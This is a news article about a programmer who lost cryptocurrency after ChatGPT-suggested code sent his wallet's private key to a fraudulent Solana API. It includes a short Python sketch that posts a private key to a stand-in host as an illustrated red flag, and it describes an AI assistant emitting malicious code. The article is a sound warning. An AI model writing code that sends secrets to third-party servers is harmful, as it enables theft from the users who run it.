ChatGPT: Code with fraudulent API costs programmer 2,500 US dollars

A cryptocurrency enthusiast wanted to program a "bump bot" with ChatGPT. The AI built a fraudulent API into the code.

Programmer in front of the computer, an AI bot behind the monitor holding a wallet.

(Image: created with AI in Bing Designer by heise online / dmk)


A cryptocurrency enthusiast has reported on X that a programming attempt with ChatGPT cost him 2,500 US dollars. He wanted to use the AI to write a so-called bump bot that would promote his tokens for a cryptocurrency trading platform on Discord servers.

What he did not expect was that ChatGPT would point him to a fraudulent Solana API. By his own account, he copied the suggested code, which transmits the wallet's private key to that API, and he used his main Solana wallet to do so. "When you're in a hurry and doing so many things at once, it's easy to make mistakes," sums up the developer, who posts under the handle "r_ocky.eth".

r_ocky.eth is evidently not very familiar with security or programming: private keys are never handed out; they stay on the owner's machine and are used to sign transactions or decrypt messages. Development should also never be done with a "production account", but with a separate test wallet. The code snippet he shows in a screenshot even states openly what it does: the comment "Payload for POST request" is followed by the field into which programmers are supposed to enter their private key.
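What that pattern looks like in practice can be illustrated with a minimal Python sketch. The endpoint URL, field names, and function below are hypothetical stand-ins, not the code from the screenshot; the decisive red flag is the same, though: the private key is placed in the request body and sent to a third-party server.

```python
# Sketch of the red-flag pattern described in the article (hypothetical endpoint and fields):
# a POST request whose payload contains the wallet's private key.
import requests

API_URL = "https://example-solana-api.invalid/pumpapi/trade"  # hypothetical, not the real fraudulent API

def create_bump_order(private_key: str, token_address: str) -> dict:
    # Payload for POST request -- the private key leaves the machine here.
    # Legitimate Solana tooling never asks for this: transactions are signed
    # locally, and only the signed transaction or the public key is transmitted.
    payload = {
        "private_key": private_key,   # <-- red flag: never send a private key anywhere
        "token": token_address,
        "action": "bump",
    }
    response = requests.post(API_URL, json=payload, timeout=10)
    return response.json()
```

Anyone reviewing AI-generated code should treat a request body like this as an immediate stop sign, regardless of how plausible the rest of the bot looks.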


The fraudster behind the API acted quickly, the victim reports: within about 30 minutes of the code sending its first request, all crypto assets had been transferred out of his wallet into the attacker's. He concedes that he made mistakes himself, but says he has nevertheless lost his trust in OpenAI. He reported the chat history containing the fraudulent code to OpenAI and notified GitHub about the fraudulent repository, which was quickly taken down.

There have been frequent reports of OpenAI's ChatGPT being used to develop malware. That ChatGPT can also produce malicious code because of "data poisoning" in its training data is apparently not yet widely understood. This case shows once again that AI output should never be trusted blindly, but always reviewed.

(dmk)


This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.